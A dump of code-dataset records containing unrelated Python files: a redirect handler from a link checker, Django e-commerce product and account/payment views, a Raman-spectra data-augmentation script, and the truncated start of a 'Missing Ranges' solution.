_is_home_page(req.cur_url):\n return _home_page_resp(req)\n # return req.get_resp()\n if req.http_code < 0:\n logging.error('do not init http code, please init it')\n return req.get_resp()\n hc = req.http_code / 100\n location = req.headers.get(u'location')\n if hc != 3 or not location:\n return req.get_resp()\n # some server response Relative URL, so need to rebase it\n if location[0:7] != u'http://' and location[0:8] != u'https://':\n location_new = urlparse.urljoin(req.cur_url, location)\n logging.info('rebase location [%s] -> [%s]' % (location, location_new))\n location = location_new\n for rule in site_conf.rules:\n if isinstance(rule, conf.SiteConf.Rule) and rule.method == u'link':\n ret = rule.check_match(location)\n if ret:\n err, msg = request.code_msg.get(u'redirect_url_match')\n resp = req.get_resp()\n resp.code = err\n resp.msg = msg % rule.match_str()\n logging.info('find dead: [target_url:%s][cur_url:%s] code: %d, msg: %s' %\n (req.target_url, req.cur_url, resp.code, resp.msg))\n return resp\n if _is_home_page(location):\n return _home_page_resp(req)\n resp = util.need_crawl_next(req)\n if resp is not None:\n logging.info('need_crawl: [target_url:%s][next_url:%s, http_method: %s] code: %d, msg: %s' %\n (req.target_url, resp.next_url, resp.http_method, resp.code, resp.msg))\n return resp\n return req.get_resp()\n","sub_path":"cherrypick/4look/bin/dc/dc_link.py","file_name":"dc_link.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"639017224","text":"#endpoints\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom ecomerce_turing.models.models import Product, ProductCategory, Category, Department, Review, Customer\nfrom django.db.models import Q\nfrom rest_framework.decorators import api_view\nfrom .errors import *\nfrom .customers import verify_token\nimport datetime\nfrom django.utils import timezone\nfrom django.views.decorators.cache import cache_page\n\n#products\n#Get All Products, or\n#Product by ID, or\n#Get a list of Products of Categories, or\n#Get a list of Products on Department\n@api_view(['GET'])\n@cache_page(60 * 15) #cahce product data for 15 minutes\ndef products(request, product_id=0, category_id=0, department_id=0):\n if (product_id==0):\n #all products\n try:\n page = int(request.GET.get(\"page\"))\n if (page<1): page=1\n except:\n page = 1\n try:\n limit = int(request.GET.get(\"limit\"))\n if (limit<1): limit=20\n except:\n limit = 20\n try:\n description_length = int(request.GET.get(\"description_length\"))\n if (description_length<1): description_length = 200\n except:\n description_length = 200\n if (department_id!=0):\n total_count = Product.objects.filter(\n product_id__in=ProductCategory.objects.filter(\n category_id__in=Category.objects.filter(department_id=department_id).values(\"category_id\")\n ).values(\"product_id\")\n ).count()\n elif(category_id!=0):\n total_count = Product.objects.filter(\n product_id__in=ProductCategory.objects.filter(category_id=category_id).values(\"product_id\")\n ).count()\n else:\n total_count = Product.objects.all().count()\n start_item = (page -1 ) * limit\n end_item = start_item + limit\n rows = []\n if (start_item<=total_count):\n if end_item>total_count: end_item = total_count\n if (department_id!=0):\n p = Product.objects.filter(\n product_id__in=ProductCategory.objects.filter(\n category_id__in=Category.objects.filter(department_id=department_id).values(\"category_id\")\n ).values(\"product_id\")\n ).order_by('product_id')[start_item:end_item]\n elif(category_id!=0):\n p = Product.objects.filter(\n product_id__in=ProductCategory.objects.filter(category_id=category_id).values(\"product_id\")\n ).order_by('product_id')[start_item:end_item]\n else:\n p = Product.objects.all().order_by('product_id')[start_item:end_item]\n for i, c in enumerate(p):\n rows.append({\n \"product_id\": c.product_id,\n \"name\": c.name,\n \"description\": c.description[:description_length],\n \"price\": c.price,\n \"discounted_price\": c.discounted_price,\n \"thumbnail\": c.thumbnail\n })\n return JsonResponse({\"count\": total_count, \"rows\": rows}, safe=False)\n else:\n #single product\n try:\n p = Product.objects.get(product_id=product_id)\n product = {\n \"product_id\": p.product_id,\n \"name\": p.name,\n \"description\": p.description,\n \"price\": p.price,\n \"discounted_price\": p.discounted_price,\n \"image\": p.image,\n \"image2\": p.image_2,\n \"thumbnail\": p.thumbnail,\n \"display\": p.display\n }\n return JsonResponse(product, safe=False)\n except:\n return error(404, \"PRD_01\")\n\n\n\n#Search Products\n@api_view(['GET'])\n@cache_page(60 * 15)\ndef search(request):\n string = request.GET.get(\"query_string\")\n if (string==None):\n return error(400, \"USR_02\")\n try:\n page = int(request.GET.get(\"page\"))\n if (page<1): page=1\n except:\n page = 1\n try:\n limit = int(request.GET.get(\"limit\"))\n if (limit<1): limit=20\n except:\n limit = 20\n try:\n description_length = int(request.GET.get(\"description_length\"))\n if (description_length<1): description_length = 200\n except:\n description_length = 200\n all_words = request.GET.get(\"all_words\")\n if (all_words!=\"off\"): all_words = \"on\"\n if (all_words == \"on\"):\n total_count = Product.objects.filter(\n Q(name__contains=string) | \n Q(description__contains=string)).count()\n else:\n total_count = Product.objects.filter(name__contains=string).count()\n start_item = (page -1 ) * limit\n end_item = start_item + limit\n rows = []\n if (start_item<=total_count):\n if end_item>total_count:\n end_item = total_count\n if (all_words == \"on\"):\n p = Product.objects.filter(\n Q(name__contains=string) | \n Q(description__contains=string)\n ).order_by('product_id')[start_item:end_item]\n else:\n p = Product.objects.filter(\n name__contains=string\n ).order_by('product_id')[start_item:end_item]\n for i, c in enumerate(p):\n rows.append({\n \"product_id\": c.product_id,\n \"name\": c.name,\n \"description\": c.description[:description_length],\n \"price\": c.price,\n \"discounted_price\": c.discounted_price,\n \"thumbnail\": c.thumbnail\n })\n return JsonResponse({\"count\": total_count, \"rows\": rows}, safe=False) \n\n\n#Get details of a Product\n@api_view(['GET'])\n@cache_page(60 * 15)\ndef details(request, product_id):\n try:\n p = Product.objects.get(product_id=product_id)\n product = {\n \"product_id\": p.product_id,\n \"name\": p.name,\n \"description\": p.description,\n \"price\": p.price,\n \"discounted_price\": p.discounted_price,\n \"image\": p.image,\n \"image2\": p.image_2,\n }\n return JsonResponse(product, safe=False)\n except:\n return error(404, \"PRD_01\")\n\n\n#Get locations of a Product\n@api_view(['GET'])\n@cache_page(60 * 15)\ndef locations(request, product_id):\n p = ProductCategory.objects.filter(product_id=product_id).values(\"category_id\")\n c = Category.objects.filter(category_id__in=p)\n rows = []\n for i, c in enumerate(c):\n rows.append({\n \"category_id\": c.category_id,\n \"category_name\": c.name,\n \"department_id\": c.department_id,\n \"department_name\": Department.objects.get(department_id=c.department_id).name\n })\n if (len(rows)==0): return error(404, \"PRD_01\")\n return JsonResponse(rows, safe=False)\n\n\n#Post/Get reviews of a Product\n@api_view(['GET','POST'])\n@cache_page(60 * 15)\ndef reviews(request, product_id):\n if (request.method==\"GET\"):\n #get reviews\n r = Review.objects.filter(product_id=product_id).order_by(\"-created_on\")\n rows = []\n \n for i, c in enumerate(r):\n customer = Customer.objects.get(customer_id=c.customer_id)\n rows.append({\n \"name\": customer.name,\n \"review\": c.review,\n \"rating\": c.rating,\n \"created_on\": str(c.created_on)[0:19]\n })\n return JsonResponse(rows, safe=False)\n else:\n #post reviews\n verify_tk, response = verify_token(request.headers)\n if verify_tk:\n customer_id = response[\"customer_id\"]\n else:\n return response\n rating = request.POST.get(\"rating\")\n review = request.POST.get(\"review\")\n if rating == None: return error(400, \"USR_10\", \"rating\")\n if review == None: return error(400, \"USR_10\", \"review\")\n try:\n rating = int(rating)\n if (rating<1 or rating>5): return error(400, \"USR_11\", \"rating\")\n except:\n return error(400, \"USR_11\", \"rating\")\n if (len(review)<5): return error(400, \"USR_11\", \"review\")\n try:\n product = Product.objects.get(product_id=product_id)\n except:\n return error(404, \"PRD_01\")\n r = Review(\n customer_id = customer_id,\n product_id = product.product_id,\n review = review,\n rating = rating,\n created_on = timezone.now()\n )\n r.save()\n return JsonResponse({}) \n","sub_path":"ecomerce_turing/app/api/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"338096208","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.decorators.http import require_POST\nfrom payment import creat_payment_url, notify_alipay_action, return_alipay_action\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User, Group\nfrom django.core.urlresolvers import reverse\nfrom account import common as Common\nfrom account.servercontrol import ServerControl\nfrom account.shipping import shipping, shipping_gift\nfrom django.utils import timezone\nfrom datetime import timedelta\nfrom time import time\nfrom django.contrib.auth import *\nfrom models import *\nimport logging\nimport random\nimport json\nfrom pprint import pprint\n# Create your views here.\n\n\ndef option():\n p = Option.objects.all()\n tmp = {}\n for i in p:\n tmp[i.key] = i.value\n return tmp\n\n\ndef clac_check_no(des_no):\n ran = random.sample(range(5), 3)\n des = des_no[-5:]\n tmp = ''\n for i in range(5):\n if i in ran:\n tmp += chr(int(des[i]) + 65)\n else:\n tmp += des[i]\n tmp = tmp.replace('I', 'Z')\n tmp = tmp.replace('1', 'Y')\n tmp = tmp.replace('0', 'X')\n tmp = tmp.replace('O', 'W')\n return tmp\n\n\ndef _pay(request, user_game_id):\n host = 'http://' + request.get_host()\n return_url = host + reverse('account:alipay_return', args=(user_game_id,))\n notify_url = host + reverse('account:alipay_notify', args=(user_game_id,))\n p = option()\n if request.method == 'GET':\n dpo_id = int(request.GET.get('dpo_id'))\n dpo = get_object_or_404(DirectPaymentOrder, pk=dpo_id)\n if request.method == 'POST':\n ug = get_object_or_404(UserGame, pk=user_game_id)\n paymentgood_id = int(request.POST.get('paymentgood'))\n paymentgood = get_object_or_404(PaymentGood, pk=paymentgood_id)\n count = int(request.POST.get('count'))\n money = paymentgood.price * count\n if user_game_id == int(p['gift_user_game_id']):\n email = request.POST.get('email')\n uid = 10000\n remarks = email\n else:\n zone = int(request.POST.get('zone'))\n uid = int(request.POST.get('uid'))\n remarks = str([zone, uid])\n number = str(int(time()*100)) + '0' + str(uid)\n dpo = DirectPaymentOrder(\n number=number,\n user_game=ug,\n paymentgood=paymentgood,\n money=money,\n created_date=timezone.now(),\n status='obligation',\n remarks=remarks,\n uid=uid,\n )\n dpo.save()\n pay_data = {\n 'return_url': return_url,\n 'notify_url': notify_url,\n 'dpo': dpo,\n }\n return pay_data\n\n\ndef view_template_base(request, url):\n sub_menu = Common.get_user_sub_menu(request.user, url)\n menus = Common.get_user_menus(request.user)\n games = Game.objects.all()\n user_games = request.user.usergame_set.all()\n p = option()\n\n data = {\n 'title': sub_menu.label,\n 'menus': menus,\n 'games': games,\n 'user_games': user_games,\n 'page': url,\n 'option': p,\n }\n\n return data\n\n\n@Common.competence_required\ndef account(request, url='information'):\n t = \"account/account.html\"\n data = view_template_base(request, url)\n return render(request, t, data)\n\n\n@Common.competence_required\ndef order(request, url='order'):\n t = \"account/order.html\"\n data = view_template_base(request, url)\n dpos = DirectPaymentOrder.objects.filter(user_game__user__exact=request.user)[:50]\n groups = request.user.groups.all()\n if len(filter(lambda x: x.name == 'SERVICE', groups)) > 0:\n p = option()\n user_game_id = int(p['donate_user_game_id'])\n dpos = DirectPaymentOrder.objects.filter(user_game__id=user_game_id)[:50]\n data['dpos'] = dpos\n return render(request, t, data)\n\n\n@Common.competence_required\ndef bind(request, game_id, url='information'):\n t = \"account/bind.html\"\n data = view_template_base(request, url)\n game = get_object_or_404(Game, pk=game_id)\n servers = game.server_set.all()\n data['game'] = game\n data['servers'] = servers\n if request.method == 'POST':\n uid = int(request.POST.get('uid'))\n server_id = int(request.POST.get('server'))\n p = option()\n server = get_object_or_404(Server, pk=server_id)\n ugs = request.user.usergame_set.filter(game=game, server=server)\n if len(ugs) > 0:\n ug = ugs[0]\n if ug.check == request.POST.get('check'):\n ug.bind_date = timezone.now()\n ug.status = 1\n ug.save()\n return HttpResponseRedirect(\n reverse('account:usergame', args=(ug.id,)))\n else:\n data['check_is_wrong'] = True\n data['uid'] = uid\n else:\n data['never_ug'] = True\n data['uid'] = uid\n return render(request, t, data)\n\n\n@require_POST\n@Common.competence_required\ndef send_check_mail(request):\n game_id = int(request.POST.get('game_id'))\n server_id = int(request.POST.get('server_id'))\n uid = int(request.POST.get('uid'))\n if uid is None or game_id is None or server_id is None:\n return HttpResponse(status=401)\n game = get_object_or_404(Game, pk=game_id)\n server = get_object_or_404(Server, pk=server_id)\n p = option()\n ss = ServerControl(server, uid, p)\n base_info = ss.base_info()\n ugs = request.user.usergame_set.filter(game=game, server=server)\n if len(ugs) > 0:\n ug = ugs[0]\n if (timezone.now() - ug.created_date) < timedelta(seconds=100):\n return HttpResponse(status=401)\n ug.created_date = timezone.now()\n else:\n ug = UserGame(\n user=request.user,\n game=game,\n server=server,\n uin=base_info.get('uin'),\n check=clac_check_no(str(uid)),\n created_date=timezone.now())\n ug.save()\n if int(base_info.get('total_recharge')) < int(p.get('vip', 60)):\n response_id = 0\n else:\n response_id = ss.send_mail(ug.check)\n logger = logging.getLogger(__name__)\n logger.info('Send Check Mail {0} To {1}'.format(response_id, uid))\n tmp = {'result': response_id}\n ret = json.dumps(tmp, ensure_ascii=False)\n return HttpResponse(ret, content_type='application/json')\n\n\n@Common.competence_required\ndef usergame(request, user_game_id, url='information'):\n p = option()\n t = \"account/usergame.html\"\n data = view_template_base(request, url)\n ug = get_object_or_404(UserGame, pk=user_game_id)\n data['usergame'] = ug\n data['game'] = ug.game\n data['zones'] = ug.server.zone_set.all()\n data['paymentgoods'] = ug.game.paymentgood_set.filter(anyone=0)\n data['paymentgoodsanyone'] = ug.game.paymentgood_set.filter(anyone=1)\n ss = ServerControl(ug.server, 0, option())\n base_info = ss.get_player_world_info(ug.uin)\n data['world_info'] = base_info\n data['min_donate'] = p['min_donate']\n return render(request, t, data)\n\n\n@require_POST\n@Common.competence_required\ndef shippingview(request, dpo_number):\n if shipping(dpo_number):\n tmp = {'result': 0}\n else:\n tmp = {'result': 1}\n ret = json.dumps(tmp, ensure_ascii=False)\n return HttpResponse(ret, content_type='application/json')\n\n\n@Common.competence_required\ndef pay(request, user_game_id):\n pay_data = _pay(request, user_game_id)\n p = option()\n freepay = p['freepay'].split(',')\n if str(request.user.id) in freepay:\n shipping(pay_data['dpo'].number, True)\n return HttpResponseRedirect(reverse('account:order'))\n url = creat_payment_url(pay_data, request.META['HTTP_USER_AGENT'])\n return HttpResponseRedirect(url)\n\n\n@require_POST\n@csrf_exempt\ndef alipay_notify(request, user_game_id):\n p = option()\n logger = logging.getLogger(__name__)\n number = request.POST.get('out_trade_no')\n if notify_alipay_action(request):\n logger.info('Notify Success : {0}'.format(number))\n if int(user_game_id) == int(p['gift_user_game_id']):\n shipping_gift(number)\n else:\n shipping(number)\n return HttpResponse(\"success\")\n else:\n logger.info('Notify Fail : {0}'.format(number))\n return HttpResponse(\"fail\")\n\n\n@Common.competence_required\ndef alipay_return(request, user_game_id):\n p = option()\n logger = logging.getLogger(__name__)\n number = request.GET.get('out_trade_no')\n if return_alipay_action(request):\n logger.info('Return Success : {0}'.format(number))\n if int(user_game_id) == int(p['gift_user_game_id']):\n # shipping_gift(number)\n url = reverse('thankyou') + '?number=' + number\n return HttpResponseRedirect(url)\n else:\n shipping(number)\n else:\n logger.info('Return Fail : {0}'.format(number))\n return HttpResponseRedirect(reverse('account:order'))\n\n\n@require_POST\ndef uid(request, uid):\n p = option()\n user_game_id = int(p['donate_user_game_id'])\n ug = get_object_or_404(UserGame, pk=user_game_id)\n ss = ServerControl(ug.server, int(uid), p)\n try:\n base_info = ss.base_info()\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.error('Get UID Exception : {0}|{1}'.format(uid, e))\n tmp = {'result': 1}\n ret = json.dumps(tmp, ensure_ascii=False)\n return HttpResponse(ret, content_type='application/json')\n tmp = {\n 'result': 0,\n 'name': base_info['name'],\n 'zone': base_info['world_id']}\n ret = json.dumps(tmp, ensure_ascii=False)\n return HttpResponse(ret, content_type='application/json')\n\n\ndef donate(request):\n t = \"account/donate.html\"\n p = option()\n data = {'option': p, }\n user_game_id = int(p['donate_user_game_id'])\n ug = get_object_or_404(UserGame, pk=user_game_id)\n data['paymentgoods'] = ug.game.paymentgood_set.filter(anyone=0)\n data['paymentgoodsanyone'] = ug.game.paymentgood_set.filter(anyone=1)\n data['min_donate'] = p['min_donate']\n return render(request, t, data)\n\n\ndef donate_pay(request):\n p = option()\n user_game_id = int(p['donate_user_game_id'])\n pay_data = _pay(request, user_game_id)\n freedonate = p['freedonate']\n if freedonate == '1':\n shipping(pay_data['dpo'].number, True)\n return HttpResponseRedirect(reverse('account:order'))\n url = creat_payment_url(pay_data, request.META['HTTP_USER_AGENT'])\n return HttpResponseRedirect(url)\n\n\ndef thankyou(request):\n t = \"account/thankyou.html\"\n number = request.GET.get('number')\n d = {}\n if number:\n dpo = get_object_or_404(DirectPaymentOrder, number=number)\n dg = dpo.dpogift_set.all()\n d['dg'] = dg\n d['mail'] = True\n return render(request, t, d)\n\n\ndef gift(request):\n t = \"account/gift.html\"\n p = option()\n data = {'option': p, }\n user_game_id = int(p['gift_user_game_id'])\n ug = get_object_or_404(UserGame, pk=user_game_id)\n data['paymentgoods'] = ug.game.paymentgood_set.filter(anyone=0)\n return render(request, t, data)\n\n\ndef gift_pay(request):\n p = option()\n user_game_id = int(p['gift_user_game_id'])\n pay_data = _pay(request, user_game_id)\n freegift = p['freegift']\n if freegift == '1':\n shipping_gift(pay_data['dpo'].number, True)\n url = reverse('thankyou') + '?number=' + pay_data['dpo'].number\n return HttpResponseRedirect(url)\n url = creat_payment_url(pay_data, request.META['HTTP_USER_AGENT'])\n return HttpResponseRedirect(url)\n\n\ndef index(request):\n d = {}\n if request.GET.get('password_is_wrong'):\n d = {\n 'password_is_wrong': True,\n }\n if request.GET.get('user_is_lock'):\n d = {\n 'user_is_lock': True,\n }\n if request.GET.get('after_register'):\n d = {\n 'after_register': True,\n }\n if request.user.is_anonymous():\n return render(request, \"account/index.html\", d)\n else:\n return HttpResponseRedirect(reverse('account:account'))\n\n\n@require_POST\ndef user_login(request):\n try:\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n except:\n return HttpResponseRedirect(reverse('index'))\n\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect(reverse('account:account'))\n else:\n url = \"%s?user_is_lock=true\" % reverse('index')\n else:\n url = \"%s?password_is_wrong=true\" % reverse('index')\n return HttpResponseRedirect(url)\n\n\ndef user_register(request):\n d = {}\n if request.method == 'GET':\n if request.GET.get('username_is_used'):\n d = {\n 'username_is_used': True,\n }\n if request.user.is_anonymous():\n return render(request, \"account/register.html\", d)\n else:\n return HttpResponseRedirect(reverse('account:account'))\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n repeat_password = request.POST['repeat-password']\n if password != repeat_password and len(password) < 6:\n return HttpResponseRedirect(reverse('user_register'))\n try:\n user = User(username=username)\n group = Group.objects.get(name='USER')\n user.set_password(password)\n user.save()\n user.groups.add(group)\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.error('User Register Exception :{0}'.format(e))\n url = \"%s?username_is_used=true\" % reverse('user_register')\n return HttpResponseRedirect(url)\n url = \"%s?after_register=true\" % reverse('index')\n return HttpResponseRedirect(url)\n\n\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect(reverse('index'))\n","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"326925878","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 27 19:38:31 2019\n\n@author: raghav\n\"\"\"\n# This module augments the dataset using some of the strategies suggested in\n# the unified solution paper\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\n\nfrom matplotlib import pyplot as plt\n\nfrom lrraman_reader import *\n\n# saving the original spectrum variables\nnp.save('ImportantVariables/Original_RRUFFspectra.npy', Ramandata_Raw_final)\nnp.save('ImportantVariables/Original_RRUFFMineralNames.npy', Minerals_Outputs_final)\n\n# Showing Within class variance in the class with maximum minerals\nunique_values, unique_indices, counts = np.unique(Mineral_Targets_values, \n return_index=True,\n return_counts=True)\nmax_counts = max(counts)\nmax_counts_value = np.where(counts == max_counts)\nSame_Class_indices = np.where(Mineral_Targets_values == max_counts_value[0])\nSame_Class_spectra = Ramandata_Raw_final[Same_Class_indices]\nprint(Same_Class_spectra.shape)\nprint(\"The name of the mineral is : \",\n Minerals_Outputs_final[Same_Class_indices][0])\nplt.figure()\nplt.title('Plot explaining within class variance for a particular Mineral: '\n + Minerals_Outputs_final[Same_Class_indices][0])\nfor i in range(Same_Class_spectra.shape[0]):\n Same_Class_Normalised = Same_Class_spectra[i, :]/max(Same_Class_spectra[i,:])\n plt.plot(Same_Class_Normalised)\nplt.savefig('ImportantPlots/Same_Class_Variance.png')\nplt.show()\nprint(\"----------------------------------------------------\")\n\n# removing the spectrum classes with only 2 and 3 spectra's each \na, counts = np.unique(Minerals_Outputs_final, return_counts=True)\nb = np.where(counts == 2)\nc = np.where(counts == 3)\nindexes_toremove = []\n\nfor i in b[0]:\n Mineral_names_toremove = np.where(Minerals_Outputs_final == a[i])\n indexes_toremove += list(Mineral_names_toremove[0])\nindexes_toremove2 = []\nfor i in c[0]:\n Mineral_names_toremove = np.where(Minerals_Outputs_final == a[i])\n indexes_toremove2 += list(Mineral_names_toremove[0])\n\n# Removing those indices\nIndices_delete = indexes_toremove + indexes_toremove2\nRamandata_Allspectra = np.delete(Ramandata_Raw_final, Indices_delete, axis=0)\nTargets_Allspectra = np.delete(Minerals_Outputs_final, Indices_delete)\nprint(Ramandata_Allspectra.shape, Targets_Allspectra.shape)\n\nnp.save('ImportantVariables/Reduced_RRUFFspectra', Ramandata_Allspectra)\nnp.save('ImportantVariables/Reduced_RRUFFMineralNames', Targets_Allspectra)\nnp.save('ImportantVariables/Reduced_RRUFFMineralDict', Mineral_Dict)\n\n# Making a dictionary and giving it values\nprint(len(set(Targets_Allspectra)))\nMineral_Names = sorted(set(Targets_Allspectra))\nMineral_Dict = dict(zip(Mineral_Names, range(len(set(Targets_Allspectra)))))\nMineral_Targets_values = np.array([Mineral_Dict[value] for value in Targets_Allspectra]).T\n\nprint(\"Spectrums removed and saved\")\nprint(\"--------------------------------------------------\")\n\n\n# Making test validation and training split\nX = Ramandata_Allspectra\ny = Mineral_Targets_values\n# Randomly shuffling all the data\nprint(Ramandata_Allspectra.shape, Mineral_Targets_values.shape)\ny = y.reshape(y.shape[0], 1)\nprint(X.shape, y.shape)\nX_ymatrix = np.append(X, y, axis=1)\nnp.random.shuffle(X_ymatrix)\nX = X_ymatrix[:, 0:X.shape[1]]\ny = X_ymatrix[:, X.shape[1]]\nprint(y, y.shape, X.shape)\n\nunique_values_test, unique_indices_test, counts_test = np.unique(y, return_index=True, return_counts=True)\n\nX_test_validation = X[unique_indices_test]\ny_test_validation = y[unique_indices_test]\n\nprint(y_test_validation.shape)\nprint(X_test_validation.shape)\n\nX_train = np.delete(X, unique_indices_test, axis=0)\ny_train = np.delete(y, unique_indices_test)\n\nprint(X_train.shape, y_train.shape)\n\n# Saving the dataset\nnp.save('ImportantVariables/Original_X_train', X_train)\nnp.save('ImportantVariables/Original_Y_train', y_train)\nnp.save('ImportantVariables/Original_X_test', X_test_validation)\nnp.save('ImportantVariables/Original_Y_test', y_test_validation)\n\nprint(\"Training and test sets made and data saved\")\nprint(\"-------------------------------------------\")\n\n\n# Showing the histogram for the Class Counts\na, counts = np.unique(Mineral_Targets_values, return_counts=True)\nhist = np.histogram(counts, )\nplt.figure()\nplt.title('Class Proportions')\nplt.hist(counts, np.arange(40))\nplt.xlabel('The count of each class')\nplt.ylabel('Number of such Classes')\nplt.savefig('ImportantPlots/ClassProportions.png')\nplt.show()\n\nprint(\"Class Proportions shown and figure saved\")\nprint(\"-------------------------------------------\")\n\n\n# Data Augmentation\n\nprint(\"Time for some Data Augmentation\")\nprint(\"The original shapes and types are as follows\")\nprint(Ramandata_Raw_final.shape, Minerals_Outputs_final.shape)\nprint(Ramandata_Allspectra.shape, Mineral_Targets_values.shape)\nprint(X_train.shape, y_train.shape, X_train.dtype, y_train.dtype)\n\n# print(augmented_targets.shape,augmented_targets)\naugmented_spectra = np.ones((1,701), dtype='float64')\naugmented_targets = np.array((1,), dtype='float64')\nfor j in range(3):\n d1 = np.arange(-15, 15, 1)\n d = np.delete(d1, np.where(d1 == 0))\n print(d)\n for i in range(X_train.shape[0]):\n spectrum1 = X_train[i]\n coin_toss = np.random.choice(d)\n spectrum2 = np.roll(spectrum1, coin_toss)\n if np.sign(coin_toss) < 0:\n spectrum3 = spectrum2[:coin_toss]\n spectrum4 = np.pad(spectrum3, (0, np.absolute(coin_toss)), 'edge')\n else:\n spectrum3 = spectrum2[coin_toss:]\n spectrum4 = np.pad(spectrum3, (coin_toss, 0), 'edge')\n spectrum4 = spectrum4.reshape(1, 701)\n augmented_spectra = np.append(augmented_spectra, spectrum4, axis=0)\n augmented_targets = np.append(augmented_targets, y_train[i])\naugmented_spectra = augmented_spectra[1:, :]\naugmented_targets = augmented_targets[1:]\nX_train_augmented1 = np.append(X_train, augmented_spectra, axis=0)\ny_train_augmented1 = np.append(y_train, augmented_targets)\n\nplt.figure()\nplt.title('Observe the shifted spectrums')\nfor i in range(5):\n plt.plot(augmented_spectra[i, :]/max(augmented_spectra[i, :]))\n plt.plot(X_train[i, :]/max(X_train[i, :]))\nplt.savefig('ImportantPlots/Data_Augmentation1.png')\nplt.show()\n\nprint(\"The shape after first augmentation are as follows\")\nprint(X_train_augmented1.shape, y_train_augmented1.shape)\nprint(\"-------\")\n\n\n# Data augmentation - added noise proportional to magnitude at each wavenumber\naugmented_spectra = np.ones((1, 701), dtype='float64')\naugmented_targets = np.array((1,), dtype='float64')\nfor j in range(3):\n for i in range(X_train.shape[0]):\n d = [10, 25, 50, 75, 100]\n coin_toss = np.random.choice(d)\n a = X_train[i]\n b = y_train[i]\n a = a + np.random.normal(loc=0, scale=np.absolute(a)/coin_toss)\n # added noise here\n a = a.reshape(1, 701)\n augmented_spectra = np.append(augmented_spectra, a, axis=0)\n augmented_targets = np.append(augmented_targets, b)\naugmented_spectra = augmented_spectra[1:, :]\naugmented_targets = augmented_targets[1:]\nX_train_augmented2 = np.append(X_train_augmented1, augmented_spectra, axis=0)\ny_train_augmented2 = np.append(y_train_augmented1, augmented_targets)\n\nplt.figure()\nplt.title('Spectra with added noise')\nfor i in range(5):\n plt.plot(augmented_spectra[i, :]/max(augmented_spectra[i]))\n plt.plot(X_train[i, :]/max(X_train[i]))\nplt.savefig('ImportantPlots/Data_Augmentation2.png')\nplt.show()\n\nprint(\"The shapes after data augmentation are as follows\")\nprint(X_train_augmented2.shape, y_train_augmented2.shape)\nprint(\"------\")\n\n# Randomly shuffling all the training data\nprint(X_train_augmented2.shape, y_train_augmented2.shape)\ny_train_augmented2 = y_train_augmented2.reshape(y_train_augmented2.shape[0], 1)\nprint(X_train_augmented2.shape, y_train_augmented2.shape)\nX_ytrainmatrix = np.append(X_train_augmented2, y_train_augmented2, axis=1)\nnp.random.shuffle(X_ytrainmatrix)\nX_train_final = X_ytrainmatrix[:, 0:X_train_augmented2.shape[1]]\ny_train_final = X_ytrainmatrix[:, X_train_augmented2.shape[1]]\nprint(y_train_final, y_train_final.shape, X_train_final.shape)\n\nprint(\"DATA IS SHUFFLED AND AUGMENTED\")\nnp.save('ImportantVariables/X_train_final_unnormalised', X_train_final)\nnp.save('ImportantVariables/y_train_final_unnormalised', y_train_final)\nprint(\"------------------------------------------\")\n\n# Normalising the spectra to max value\nprint(X_train_final.shape)\n# plt.plot(X_train_final[0,:])\n# plt.show()\nmax_values = np.amax(X_train_final, axis=1)\nprint(max_values.shape)\nX_train_final = X_train_final/max_values.reshape(X_train_final.shape[0], 1)\n# plt.plot(X_train_final[0,:])\n# plt.show()\n\n# normalising by max value for the X_test_validation\nprint(X_test_validation.shape)\n# plt.plot(X_test_validation[0,:])\n# plt.show()\nmax_values = np.amax(X_test_validation, axis=1)\nprint(max_values.shape)\nX_test_validation = X_test_validation/max_values.reshape(X_test_validation.shape[0],1)\n# plt.plot(X_test_validation[0,:])\n# plt.show()\nprint(X_train_final.shape, X_test_validation.shape)\nprint(\"DATA IS NORMALISED AND READY FOR TRAINING\")\nnp.save('ImportantVariables/X_train_final_normalised', X_train_final)\nnp.save('ImportantVariables/y_train_final_normalised', y_train_final)\nnp.save('ImportantVariables/X_test_validation_normalised', X_test_validation)\nnp.save('ImportantVariables/y_test_validation_normalised', y_test_validation)\nprint(\"DATA IS ALSO SAVED\")\nprint(\"-------------------------------------------------\")\n","sub_path":"dm2_diagnosis/experiments_deepcnn/deepcnn_training/data_augmentator.py","file_name":"data_augmentator.py","file_ext":"py","file_size_in_byte":9589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"24707998","text":"#\n# @lc app=leetcode id=100 lang=python\n#\n# [163] Missing Ranges\n#\n# https://www.lintcode.com/problem/missing-ranges/description\n#\n\n#\n# Given a sorted integer array where the range of elements are in the inclusive range [lower, upper], return its missing ranges.\n# Example 1\n# Input:\n# nums = [0, 1, 3, 50, 75], lower = 0 and upper = 99\n# Output:\n# [\"2\", \"4->49\", \"51->74\", \"76->99\"]\n# Explanation:\n# in range[0,99], the missing range includes:range[2,2],range[4,49],range[51,74] and range[76,99]\n\n# Example 2\n# Input:\n# nums = [0, 1, 2, 3, 7], lower = 0 and upper = 7\n# Output:\n# [\"4->6\"]\n# Explanation:\n# in range[0,7],the missing range include range[4,6]\n\n# Your submission beats 34.43% Submissions!\nclass Solution:\n \"\"\"\n @param: nums: a sorted integer array\n @param: lower: An integer\n @param: upper: An integer\n @return: a list of its missing ranges\n \"\"\"\n '''\n def findMissingRanges(self, nums, lower, upper):\n # write your code here\n result = []\n # nums is empty\n if(not nums or len(nums) == 0):\n 